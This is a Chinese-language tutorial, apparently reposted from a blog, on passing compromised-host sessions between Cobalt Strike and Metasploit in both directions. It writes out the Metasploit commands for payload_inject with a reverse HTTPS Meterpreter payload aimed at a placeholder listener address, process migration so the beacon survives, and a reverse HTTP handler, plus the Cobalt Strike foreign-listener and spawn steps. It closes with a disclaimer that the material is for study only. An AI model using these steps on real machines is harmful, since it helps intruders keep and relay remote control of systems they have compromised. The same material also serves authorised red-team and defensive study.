CS與MSF之間的會話傳遞


0x01 MSF會話傳遞到CS


1、 CS上的操作


點擊Cobalt Strike然后選擇監聽器,創建一個HTTPS Beacon的監聽器即可

創建成功后如下

2、 MSF上的操作


前提是已經獲取到了shell,如下:

3、 開始傳遞會話


首先,background會話

background


接着調用payload_inject模塊

use exploit/windows/local/payload_inject

設置HTTPS Payload

set payload windows/meterpreter/reverse_https

設置lhost與lport為CS的監聽器的IP與端口

set lhost x.x.x.x
set lport 5555

設置DisablePyaloadHandler為True,這個選項會讓MSF避免在其內起一個handler來服務你的payload連接,就是告訴MSF我們已經建立了監聽器,不需要再新建監聽器了

set DisablePayloadHandler True

設置PrependMigrate為True,這個設置讓MSF前置的shellcode在另一個進程當中運行payload stager,如果被利用的應用程序奔潰或者被用戶關閉,這個會幫助Beacon會話存活。

set PrependMigrate True

設置當前會話

set session 1

開始傳遞會話

exploit

整體過程如下:

此時,CS上已經可以看到MSF的會話傳遞過來了

0x02 CS會話傳遞到MSF


1、Cobalt Strike上的操作


先讓機子上線CS

2、MSF上的操作


首先,在MSF上調用handler模塊

use exploit/multi/handler

設置HTTP Payload

set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 6677

運行該模塊

run

整體過程如下:

3、開始會話傳遞


在CS上先創建一個Foreign HTTP監聽,IP和端口設置成上面MSF所設置handler模塊的端口和IP


之后在CS上面右擊待傳遞的會話,選擇Spawn,選擇剛剛創建的Foreign HTTP監聽器

來到MSF就可以看見CS的會話已經傳遞過來了

0x03 免責聲明

嚴禁讀者利用以上介紹知識點對網站進行非法操作 , 本文僅用於技術交流和學習 , 如果您利用文章中介紹的知識對他人造成損失 , 后果由您自行承擔 , 如果您不能同意該約定 , 請您務必不要閱讀該文章 , 感謝您的配合 !


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM